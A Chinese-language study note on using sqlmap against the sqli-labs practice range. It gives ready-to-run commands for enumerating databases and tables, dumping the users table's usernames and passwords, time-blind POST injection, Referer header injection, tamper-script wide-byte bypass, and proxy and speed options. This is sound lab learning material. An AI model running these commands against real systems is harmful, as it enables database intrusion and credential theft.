sqlmap的get注入方式(以sqli_lables靶场题目为例)
(--batch:要求所有数据都选取默认值)
sqlmap -u "http://192.168.31.56/Less-1/?id=1" --dbs --batch(探测库名)
sqlmap -u "http://192.168.31.56/Less-1/?id=1" -D security --tables --batch(探测表名)
sqlmap -u "http://192.168.31.56/Less-1/?id=1" -D security -T users --columns --batch(探测字段名)
sqlmap -u "http://192.168.31.56/Less-1/?id=1" -D security -T users -C username,password --batch(探测字段值)
sqlmap -u "http://192.168.31.56/Less-1/?id=1" -D security -T users -C username,password --batch --dump(探测字段值)
(记录一个问题:为啥要加dump,才能在命令行显示出字段名,而前面探测表名,字段值不用dump也能在命令行显示探测结果)
sqlmap探测post盲注(以时间盲注为例子)
使用burpsuite工具抓取http请求并生成target.txt文件
--technique:是指定探测技术B:表示布尔盲注,T:表示时间盲注,E:表示报错注入,U:表示联合注入
S:表示堆查询注入;利用-v参数指定显示等级,当取最大值等于3时,将显示sqlmap所使用的payload详情
-p/--skip :指定/跳过测试参数
sqlmap -r target.txt --technique T -p uname --dbs --batchsqlmap
进行http头注入自动搜索表单提交内容进行探测(因为less-19对username,password进行了过滤,这个方法行不通)
在http头referer字段中进行注入
sqlmap -u "http://192.168.31.56/Less-19/index.php" --forms --dbs --batch
指定注入位置,在保存的文件中,对需要注入的位置使用*修改,保存在.txt文件中然后使用
sqlmap -r less-19.txt -dbs --batch
sqlmap Tamper 脚本注入(宽字节注入less-33
sqlmap提供很多脚本,供注入时使用,脚本位置(kali):/usr/share/sqlmap/tamper
sqlmap -u "http://192.168.31.56/Less-33/?id=1" --tamper unmagicquotes -dbs --batch
代理参数
--proxy http://ip:端口
--proxy-file 使用一个包含多条代理的文件的代理
sqlmap -u "http://192.168.31.56/Less-2/?id=1" --proxy "http://127.0.0.1:8080" --threads 5 --batch
sqlmap性能优化参数:
--keep-alive :设置持久连接,加快探测速度
--null-connection:检索没有body响应的内容,多用于盲注
--thread 最大为10设置多线程
-o 开启所有默认性能优化
-smart 快速判断,节约时间
设置延迟--delay 时间。当页面无变化,布尔无真假,从来不报错时用延时注入
设置超时--timeout时间
设置重新连接次数--retries次数